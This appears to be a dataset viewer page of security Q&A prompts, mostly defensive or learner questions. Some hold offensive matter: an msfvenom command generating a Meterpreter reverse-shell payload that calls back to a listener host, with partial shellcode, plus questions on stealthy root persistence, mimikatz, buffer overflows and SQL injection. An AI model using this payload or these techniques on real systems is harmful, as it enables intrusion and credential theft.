instruction stringlengths 24 29.9k |
|---|
I scanned a site using a vulnerability scanner and it found a vulnerability with a CVV score of 10. Should I send the report to the company?
|
I want to know more about the real name policy and if I can use scrappymatt on google. Facebook uses the real name policy but I’m not sure about google
|
The Telegram messaging application apparently stores messages on its servers (at least - that's what it says in answers to this question here on the site). Is that everything it stores or forwards to a third party? Let me be more specific. Does Telegram store or forward...
Messages in groups?
Messages in bi-partisan c... |
I have the following output by ClamAV:
Starting a daily scan of /root directory.
Amount of data to be scanned is 205M.
Starting a daily scan of /var/www directory.
Amount of data to be scanned is 121G.
LibClamAV Warning: [Bytecode JIT]: Bytecode run timed out, timeout flag set
LibClamAV Warning: [Bytecode JIT]: recover... |
As a new student of cyber security, I have started to see in real-time how an individual can actually scan and view the mac addresses on a public wifi connection.
How can I hide my mac address when using a public wifi connection? Please I mean aside from not using public wifi at all.
Also, I am very DIY, but I am stil... |
I would like to ask about steps and methodologies for Active Directory pentesting. I used tools like responder, powerview, pingcastle and mimikatz, but maybe there are other methods that are useful.
|
I don't want to get hung up on technical terms, just laying out basics for this question: I understand personal identifying information (PII) as that info which is not apparent to people who cross paths with you day to day and which could be used to prove your identity. For example, my name and face are not really priv... |
As part of a course I'm doing, it's presented a case study. I'm a bit stuck and not too sure where to find further info. If someone could point me in the direction, I'd appreciate it.
In this case study, a network using Red Hat Linux mail and file servers, a proprietary SIEM server and several Windows 2012 servers have... |
I am a software developer starting studying application security and I have the following doubt related SQL injection.
I am following a video course and there are these two examples:
I have an insecure SQL query like this:
txtSql = "SELECT * FROM Users WHERE UserId = " + txtUserId
If the passed value of txtUserId is ... |
So I have been reading about SSL pinning in context of a requirement where we have to interact with a web service operated by a partner of ours. We have an Android App and we would be making network calls to their service in a WebView(embedded web browser) and while SSL pinning has been labeled as the solution to verif... |
As far as I understand the process of logging someone into your system goes like this:
1) The user which wants access transmits credentials to your system (typically login - being a unique identifier - and password)
2) The system uses the login to retrieve the account information from a database comprising a passwordh... |
I'm considering encrypting a series of TAR archives using AES. Something I'm concerned about is the TAR format being quite predictable regarding field content and block sizes:
Each file object includes any file data, and is preceded by a 512-byte
header record. The file data is written unaltered except that its
le... |
I want to test for security vulnerabilities in an Android App and hence want to monitor all HTTP(S) calls being made from an Android App.
I have setup BurpSuit in my Laptop and have also set up the proxy in my Android device. After installing the Burp certificate in the user trusted certificates I am able to monitor th... |
Just wondering what is the story behind the front cover image of Schneier's Applied Cryptography book https://www.schneier.com/books/applied_cryptography/
Who is the author? Is it some famous picture encrypted or there's a much simpler explanation?
|
Testing a website i am in this scenario, i found a CORS endpoint that allows any subdomains to access it, so for example:
Real request:
Origin: https://abc.realwebsite.com --->
access-control-allow-origin: https://abc.realwebsite.com
but as it accepts every subdomain i am able to change it like this:
Modified reques... |
I am reading information about RSA and Eliptic Curves cryptography. Assuming that both these two algorithms have stages until two parts achieve key exchange. If an attacker eavesdrop the stages before achieving successful key exchange, and more specifically in wireless nodes, can't he manage to read/eavesdrop critical ... |
The yubico documentation mentions that a Management Key can be set manually, or it can be inferred in the SoC when setting a PIN for the first time.
What exactly is that management key and how does it play any role on the CCID flow? What are the consequences of a compromise of that key?
|
Currently I am using haveged on my server as source of entropy.
My Server is used as KVM hypervisor, to run virtual machines.
I did not use haveged at the beginning, and I noticed the VMs were draining the entropy pool from the server. Sometimes, when VMs were started SSH waited for enough entropy (to generate session ... |
Was messing around with a project today that uses the build tool Gradle and I noticed that by default, it's running a daemon server process that listens on all interfaces.
Output of ss below.
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 *:37... |
I have lot's of passwords saved in Firefox Password Manager, now called Lockwise. I recently installed Opera Browser on my machine. It somehow managed to import all the history-data and form fields, such as username and passwords into the Opera's local database.
As I understand, the username and passwords are send to t... |
I am a software developer converting do application security and I have some doubts about SQL injection example.
I am following a tutorial related the famous DVWA: http://www.dvwa.co.uk/
So I have the following doubt (probably pretty trivial).
I have this PHP code defining the query and the code to perform it:
<?php
i... |
I wonder if Sim Card traffic can be sniffed? I mean only the internet connection when it makes to requests to several websites. Sniff those traffic by WireShark maybe?
P.S: not messages, only network traffic, where it is sending data and what kinda.
Is it possible with special hardware?
|
Facebook has served me an ad for a website I visited earlier in the day. I have third party cookies disabled and have not followed any links between the website and Facebook (links which could contain a tracking ID connecting my Facebook account to the website).
Without third party cookies, how can Facebook know that I... |
I've had problems with making a account on a website (https://etsy.com)
I tried different browsers, disabeling all my plugins with no succes.
I use a VPN service that automaticly turn on when I start my PC. My last deperate atempt was to turn my VPN of and that did the trick, I was able to register a account.
I find th... |
I realise that similar questions have been asked before regarding the EFI System Partition, but I just cannot seem to get my head around this, or indeed get a direct answer.
When I boot into Linux, my files are protected, albeit in a basic manner, by permissions. The same is true of Windows, and of course most modern O... |
I'm currently developing an android bank client app. Obviously security is key here. The app sends requests over HTTPS TLSv1.2 to my java server.
What I currently have in mind
Login
The app asks for user's username and password and sends these in plain text over HTTPS TLSv1.2
The password is hashed with bcrypt and if c... |
I was told that Hackers scan for open ports in random IPs and if they are open they hack the computer.
What open ports can be hacked? How do I close the ports?
|
I can confirm an intrusion from an unknown MAC address (identified as a Realtek device), getting a new, valid IP from the DHCP pool, and using the network for roughly 1 hour.
The network is WPA2 - 1 each for 2.4Ghz and 5Ghz both with the same password. The 2.4Ghz network also includes a TP-Link extender, which creates ... |
I wrote a vulnerable test program to practice buffer overflows; however, I was having trouble getting it to work. Finally, after slightly modifying the return address, I was able to gain a shell, but I don't understand why this small, seemingly-insignificant change fixed my issue.
vuln.c
/**
* Compile:
*
* $ gcc -fn... |
I designed a small webapp (I would rather call it browserApp) that helps me to automate a task. Now, I don't need a webserver to host this app as it is merely using js, jquery and other js libraries to run it in my browser which is good enough for me, plus, does not make use of databases or another tier like an apache ... |
Navigating to the below URL link from the Mozilla Firefox and entering some website link and clicking on View, displays certificate Viewer
chrome://pippki/content/exceptionDialog.xul
After enabling Decrypt & scan HTTPS traffic from the firewall rule, all the clients cannot go to www because they don’t have SSL CA Ce... |
I was tasked to implement FIPS certified providers in Java in our Docker images. We are going with Bouncy Castle's bc-fips. I see many providers listed in java.security:
security.provider.1=SUN
security.provid... |
There is a site which hosts coding competitions for coding and placements.
They issue certificates for winning the coding exam or at least get into the finale round.
I did not participated in that competition but my friend did.
He posted the certificate on LinkedIn with the links of it.
I being on the same coding platf... |
Every day my server receives many GET requests in search of security holes. In other words, they are trying a list of words in search of a hole.
for example:
http://myapp.com/phpmyadmin
http://myapp.com/pma
http://myapp.com/phpini.php
http://myapp.com/phpMyAdmin-2.11.7.1-all-languages-utf-8-only
http://myapp.com/phpM... |
I've seen a lot of people talk about how to pentest and how NOT to get caught during engagements but have a hard time finding "How to behave when caught during a Red Team engagement".
Red Teams are to simulate adversaries attacking systems. Many actions can't be done (or at least very hard to) with just some computers ... |
If a fingerprint scanner were a human it would probably be like this:
take a photo of the finger presented for authentication
check it against the original photo to determine if it's the same.
This would lead to the problem that the process has a copy of the scanned finger and anyone stealing this then owns/pwns a 'p... |
In the last couple of weeks I've received several e-mails at my work account (a small research non-profit). The format is similar for all:
"Test mail" in subject line
No content in body
Address follows the format: [First name][two or three digit number][last name]@gmail.com
I do not recognize the names, and as this is... |
Assuming that a company has an AD/LDAP server with accounts for all employees and has many internal systems that must authenticate those users, what would be a good solution in terms of security best practices to allow these systems to access LDAP server?
I think it's bad allowing many different systems accessing the c... |
Consider I have root ssh access to a Linux server (Ubuntu 18.04 LTS). What is the best way to maintain access even after losing ssh access? Are there any tools out there to help maintaining stealthiness and access(root)?
|
Consider an (Java) application that will be deployed on an off-the-shelf laptop in a public location. The laptop is not connected to any network or the internet. A USB barcode scanner is available as an additional input device. For the application to function properly, it needs access to a local (SQLite) database with ... |
I'm building an application and I have some very, very advanced users who can come up with endless filters they want. They know SQL so in the end gave them some of the filters and said in the bottom of the screen you can have your custom filter, where you can write your own filter in SQL. And they where pleased. So my ... |
I am programming a way in PHP for my users to be able to access a remote API though my website. I was wondering if any of you had some input on whether or not this was secure (NOT considering any vulnerabilities that may be on the remote system)
print file_get_contents("https://website.com/?uid={$_GET['uid']}");
Is th... |
I am currently studying the most widely known encryption algorithms and methodologies. For practice purposes, I want to implement everything from ECB to RSA as some kind of a C crypto library. How would I generate a secure key in a C program (I know, that writing a crypto library on my own is not secure at all but I ju... |
I'm a dev trying to deploy a new dashboard I've written at work, the old one is a mess of hacked together libraries and only about half of the codebase is still even in use (dead code everywhere that just never got deleted, but doesn't do anything)...
I'm not willing to kill myself over this nonsense one more second, I... |
Websites can fingerprint a web browser with techniques involving WebGL and HTML5 Canvas. The website like https://amiunique.org/fp shows an example of this. How exactly do these techniques work? I know they involve the uniqueness of the graphics card. Why would a web browser even expose this information? Since graphics... |
Is there any risk of data corruption if I store TrueCrypt containers inside a fully encrypted USB (USB encrypted using Veracrypt)?
Does encryption inside encryption increase chances of data corruption or other issues?
|
Ever since we upgraded one of our home windows machines to Windows 10, Kaspersky has been logging blocked network intrusion attempts over port 8080. The exploit is a strange one and tries to hit a vulnerability that the machine doesn't have. Confused, I ran an nmap version scan on the local address of the machine in ... |
Let's say I have some java application running on the host and do different things, and now I have built a jar that captures network traffic. While reading What's a least-privilege way to allow node.js to access network adapters on Linux?, it seems to me that the best way to apply the least privilege is to do use setca... |
Instagram increases its security day by day. Whenever someone logs in to an account from another device, an unusual login attempt comes to screen and the person gets notification about it. How does Instagram get to know about it? Do they trace the IP address or some other thing? If a user (ethical hacker maybe) wants t... |
Guys hello. One of my friend laptop get infected with STOP ransomware, all files are encrypted with .mosk extension.The admin account of machine is also compromised, we tried to install emisoft decryptor in the machine, but unfortuantely it's not allowing to install anything as the admin account is managed by attacke... |
Nowadays, any credit/debit card transaction made online (at least for mine) requires one to enter the card details (Account No., Expiry Date, CVV etc). In the end, a OTP (One Time Pass) is sent to the mobile number linked to that Credit/Debit card for 2-Factor Authentication.
In this process, if someone (other then the... |
Is it possible to have the public component of a key pair being capable only of decryption?
|
As you may already know old Openssl versions were vulnerable(OpenSSL 1.0.1 through 1.0.1f (inclusive)) by the HeartBleed vulnerability. Currently our server is running Tomcat7 which is built in a vulnerable Openssl, so we upgraded into Tomcat8 but we didn't regenerate the SSL certificates.
So my question is I wonder i... |
I want to generate an OTP, that is valid once in a certain time window in the future. That time window is in the range of minutes to hours. After being used in that window, the OTP may not be used again. I found TOTP and HOTP on this topic. You can create passwords with TOTP for future time windows, but it can then be ... |
If the access is secured; users are chrooted in their home directory, and other security basics, how difficult is it for users to access other data on the server?
Dedicated server
Linux CentOS
ftp server software : Pureftpd
TLS enabled
FTP users are virtual users with no access to OS shell
Each users are in the same g... |
In class, I was given the task of using LFI and RFI to find tokens hidden in specific web pages. I completed the first two tasks fine, however, there is another task, the final boss if you will, that I am stumped on.
We are meant to find a token in /var/www/token.txt but when using LFI it doesn't work. It comes up wit... |
I've been using LastPass for years, generally through the original Chrome extension.
In recent months, certain features of the extension have been totally broken, such as the ability to share passwords or the ability to generate new random passwords.
(Their support team has been unhelpful, as others have experienced to... |
If you connect to the internet using a router that's controlled by a hacker, is there some way you can safely surf the internet without getting hacked? By using a vpn and firewall maybe?
Does it make a difference what kind of router it is?
A wired router
A wireless router
A 4g usb dongle (Could this be used for a bad... |
just a quick question - does BitLocker encrypt everything including host protected area, device configuration overlay and bad sectors?
|
I recently bought a domain through CheapName.com which offers free email forwarding. I would like to use it to have a unique email for every account I make online (because it can be set up so all emails with your domain are forwarded to a catch-all email address).
Would email forwarding cause any security issues that w... |
I am pentesting a super strange website and was trying to get Stored XSS on their main website. After some hours of testing i found that it is possible to inject sucesfully without any encoding:
<img src="any" alt="any">
Cool right? the thing is i have tried +50 event handlers (some of them not even working for images... |
The IT Security department is getting audited and the auditor had approached our IT Security team and requests to see results of the password review process, which compares existing database of passwords which are hashed and custom salt against the password policy requirements. If I am not wrong, I should not be provid... |
From my previous question, I've seen that a "Permission to Attack" slip is crucial in ANY Penetration Test. However, that question and its answers and comments have only discusses interactions between the Pentesters and the client's party (their staff).
How should we deal with 3rd parties such as:
"Casual" targets
Ne... |
A router (or one spoofing as a router) unilaterally sent to a client an EAPOL packet 1 of 4, and then immediately sent 5 packets of EAPOL packet 3 of 4.
Is this the signature of a KRACK attack? And if so, how would I know if the attack (and spoofed connection) was successful or failed.
|
KMSpico is a very common tool to crack Windows. It is considered malware by many malware/virus detection programs. Even so, it is very popular as far as I've seen.
Download links I found:
https://kmspico10.com/
https://official-kmspico.com/
https://www.kmspico2k.com/
https://kmspico.co/
With so many "official websit... |
I recently had another domain point to one of my servers. After adding some nginx configuration I was able to mitigate this. My server now throws a 404 in this scenario.
My question is what are the risks when another domain successfully points to your server?
|
We developed an application that reads a CMS encoded PEM file with this command:
$ openssl cms -verify -in filepath -inform PEM -noverify
The file is digitally signed, but we don't care about it, as we only want to extract the contents inside (it starts with: -----BEGIN CMS----- and has a ".pem" extension). That is wor... |
I'm a Burp newbie, but I've been working on it for several days now and still haven't come up with a satisfactory answer to this apparently simple problem.
What I want to do seems quite straightforward:
Scan a site (automatically initially).
Fix one issue.
Repeat the single test/request that found the issue (or if ... |
I started a minecraft server and I want to have it running 24/7 with open ports so that friends can play. My dad thinks that we will be hacked because of the open ports, and I have hardly any knowledge of networking and such. So can anyone tell me the risks and how to prevent said risks like I'm five years old? Thanks!... |
I have in my inbox what I believe to be (95% sure) a phishing attack email or my IT department doing a phishing attack knowledge awareness campaign.
I'm a very curious person by nature and I'd like to poke around and see what is under the hood. What would be the safest way to open the document to see its actions and ev... |
Recently I've been thinking about how I installed my linux system (I went for debian). When I installed it, I chose not to enter password for root and only entered password for my user account. My question is whether it can be somehow exploited and is it possible to login as root when I didn't provide any password? I t... |
I have been reading RFC 5246 on TLS 1.2 and have a few questions on algorithms chosen. Before I start, let me clarify that I am reading on 1.2 and not 1.3 because my ultimate interest is in DTLS 1.2.
I am confused with what appears to me to be conflicting definitions of cipherSuites, key exchange algorithm, bulk encryp... |
Just doing some reading surrounding analysing intrusions, I’ve read that Windows Event Logs can be modified by an attacker to cover their tracks, how accurate is this and what are the alternative for a systems analyst?
|
After deciding to be security engineer, everything that I do, for example visiting pages, downloading any content or apps, etc. seems suspicious. So today I encountered something strange in my new VPN.
I heard about a free and secure VPN service www.urban-vpn.com. Firstly, their page uses Lets Encrypt, maybe there is ... |
If I have VPC which is in-scope (the "PCI VPC") and another which is not (the "NON-PCI VPC"), would peering them bring the non-pci vpc in-scope? Is there a way to avoid this?
I have an aurora RDS inside the PCI VPC. It does not actually contain sensitive information, but is used by services which do. What is the best w... |
I have a postgres 11 database with no confidential information in it and in the application an intruder can write queries inside the following update statement.
UPDATE table
SET col_a = val_b
WHERE {potentially some other filters}
AND {injected SQL};
I have restricted it such that no strings with ;, /* or -- are allow... |
So after running the command:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.31 lport=8080 -f py
I receive the output:
buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\... |
Not a sys admin here. So please forgive ignorance.
I have read the suggested Q/A here:
My question is:
How do I get an SSL Certificate from my client,(even if it is created for use with several names), and apply it to my server?
Here is my situation.
We have an AWS instance/DB serving a site we built for a client.
Th... |
I want to write a python script that is able to fingerprint ports on a server to identify the FTP client running on the port.
While there is often a Banner message upon connection, this message is not reliable or can be removed easily.
Is there any tool / database etc available which can help to identify the differen... |
What if I code a program without malicious code which would pass in every antivirus scan and after the virus scan and user giving special rights to it, it downloads and executes the real virus? Since the first step was successful to get admin rights, the next steps are easy, sure?
|
I own a Memory Stick Pro Duo Mark-II (MagicGate compatible). It is used as a storage medium in my Playstation Portable.
Upon searching on Google for the same, I only found a wikipedia page of it, which states:-
MagicGate is a copy-protection technology introduced by Sony in 1999 as part of the Secure Digital Music Ini... |
Possibly basic question from a developer, not a security expert.
AFAIK, a very common setup for web sites is to have 1 or more web servers behind a firewall and load balancer, with the web servers sending requests to a database server via an internal network (not accessible from the outside world).
I have now been told... |
So I am currently struggling with a cyber security lab, and after searching various online sources and reading documentation I can't find a solution. The 2 tasks are as follows:
"The attacker has deployed the Mimikatz tool to attempt to
capture plaintext passwords. What is the filename of the Mimikatz
executable o... |
Let's say that company X is PCI certified and compliant as a merchant.
In terms of PCI compliance, what does company X have to consider while working with third parties? E.g. for business reasons company X needs to forward hashed PAN numbers to a third-party provider. What does company X have to do in order not to vio... |
My AWS Elastic Beanstalk server is often reporting Environment health has transitioned from Ok to Severe. 100.0 % of the requests are erroring with HTTP 4xx. This happens almost daily for a few minutes at a time. I also found the logs below in my ngnix error logs. What are these? Are they some kind of DOS attack? I loo... |
I have a website and my users will be using their selected password to encrypt their RSA private key using JavaScript client-side. How should I be making sure they are using a strong password without transmitting it to the server?
|
Is there a way to find out what type of encryption is being used on this data? I was playing around with a game data and i cant get around it .
This Is the data im trying to decrypt, any help?
Code:
YofHvjcQ8Ltyc1BgDFpLjDAgwHzqopWj0OzbHxQ9TwwxqgmPxHDHebuO4jyMqQuc+HksNt83k5jhlHbol9S/lTWqFDBKtNA9kSwX3WnkN1B8nALoad+Ve0+Yn... |
My neighbour is actively trying WPS pins on my router - I know because the "WiFi/WPS" LED on my router lit up when I have permanently turned it off! I double checked the setting using the router admin page through ethernet and it confirmed LED's were off (except during WPS negotiation, which overrides the off setting).... |
I am facing a problem with Nmap while scanning metasploitable.
I am using two different PCs. One with Kali Linux by using USB boot and on other PC using Metasploitable running on VMWare. I have configured the IP address in both machines and they can ping each other because I have configured the VMWare in Bridge connect... |
I have a windows application that runs in 2 processes and communicates over localhost network port.
This application can hold secrets, such as a web cookie.
I'm trying to think through the security vulnerabilities.
My impressions:
With modern virtual memory, applications have protected execution space (DEP) by defau... |
As a user of these products, how concerned do I have to be about who can see what I place in the system?
I don't know who pays the bill and thus has access to everything in there, and I don't know where the computers are that are storing the data, if it's encrypted etc...
If I was using a similar system in Linux I woul... |
When registering a new credential as part of WebAuthn, why does the client need to be sent a challenge?
Presumably this is to prevent a replay attack, but wouldn't a replay attack be prevented by TLS already?
|
I have an img tag on a page with an line style that looks like this:
style="height:50px;width:180px;display:block;"
I can't move it to an external stylesheet because the img tag is generated by a 3rd party control. So I copied the hash displayed in Chrome developer tools.
Part of the Content-Security-Policy looks like... |
AWS provides access to EC2 by downloading the private key(.pem) into management host that connects to EC2.
AWS uses openssl tool
Key providers generally provide public key but not private key, because with keypairs, one can encrypt either with public key or private key and decrypt with other key, as shown below:
$ open... |
Does the metasploit module: exploit/multi/handler
sends payloads to stagers?
Or does it just listens for an incoming connection like a netcat
listener?
Or does it do both, as needed?
|
The encrypted text is public, embedded in the binary of my software which is published on the internets. I know the open text but there’s large circle of third parties who might know it too, despite it’s a secret (that’s an access key to a cloud provider).
Am I correct that even if the cloud provider leaks the secret t... |
I am completing some online labs for a cyber security course. We are meant to do specific tasks.
For this task we have a compromised virtual machine in an activity titled "compromised host" .
"The attacker has deployed the ‘mimikatz’ tool to attempt to capture plaintext passwords." I am not sure what a mimikatz tool is... |
I'm trying to find a way to securely unpack Windows Malware packed with UPX, I need to unpack a lot for analysis so automating the process as much as possible is beneficial.
I've found a few methods but I'm not sure on how secure it would be as I want to unpack the malware in a VM for security, store the unpacked malw... |
I am completing some online labs to do with cybersecurity and I have been given the task of dealing with a virtual machine of kali linux, to access a basic ip for a website called "yellow". we access it using an ip, our VM does not have an actual internet connection.
Now upon testing for a LFI exploit, there is one, ho... |
I'm thinking of buying my next phone refurbished rather than new, since I can easily get something that meets my needs for a lot cheaper. But one concern is whether something might get surreptitiously installed on the phone before it gets to me.
The phone will be an Android of some description (haven't picked a model ... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.